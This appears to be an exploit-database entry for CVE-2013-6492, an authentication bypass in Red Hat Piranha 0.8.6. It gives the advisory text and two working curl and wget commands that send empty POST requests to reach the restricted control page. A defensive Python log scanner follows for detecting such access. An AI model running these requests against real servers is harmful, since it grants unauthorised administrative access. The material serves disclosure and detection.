RedHat Piranha - Remote Security Bypass

Author: Andreas Schiermeier
type: remote
platform: linux
port: 
date_added: 2013-12-11  
date_updated: 2015-12-24  
verified: 1  
codes: CVE-2013-6492;OSVDB-101854  

raw file: 39097.txt  
source: https://www.securityfocus.com/bid/65587/info

Red Hat Piranha is prone to a remote security bypass vulnerability.

An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, which may lead to further attacks.

Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected.

curl -d'' -I http://www.example.com:3636/secure/control.php
wget -qO- --post-data='' http://www.example.com:3636/secure/control.php
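
A defender-side check for the requests shown above, added here as an example and not part of the original advisory: it scans web server access log lines for requests under /secure/ that carried no authenticated user yet were answered with a 2xx status. The Apache combined log format, the sample lines, the user name and the function name are assumptions.

```python
import re

# Apache "combined" log format (assumed): host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

RESTRICTED_PREFIX = "/secure/"  # path prefix taken from the requests above


def find_unauthenticated_hits(lines):
    """Return (host, method, path, status) for requests under the restricted
    prefix that had no authenticated user but were answered with 2xx."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        path = m["path"].split("?", 1)[0]
        if not path.startswith(RESTRICTED_PREFIX):
            continue
        # Apache logs "-" as the user when the request was not authenticated.
        if m["user"] == "-" and m["status"].startswith("2"):
            hits.append((m["host"], m["method"], path, int(m["status"])))
    return hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - piranha [11/Dec/2013:10:00:01 +0000] "GET /secure/control.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.20 - - [11/Dec/2013:10:00:05 +0000] "GET /secure/control.php HTTP/1.1" 401 381 "-" "curl/7.29.0"',
    '192.0.2.20 - - [11/Dec/2013:10:00:06 +0000] "POST /secure/control.php HTTP/1.1" 200 5120 "-" "curl/7.29.0"',
    '192.0.2.30 - - [11/Dec/2013:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, method, path, status in find_unauthenticated_hits(SAMPLE_LOG):
        print(f"unauthenticated {method} {path} -> {status} from {host}")
```

The check is method-agnostic on purpose: any successful response under the restricted prefix without a logged user is worth reviewing, whatever request method produced it.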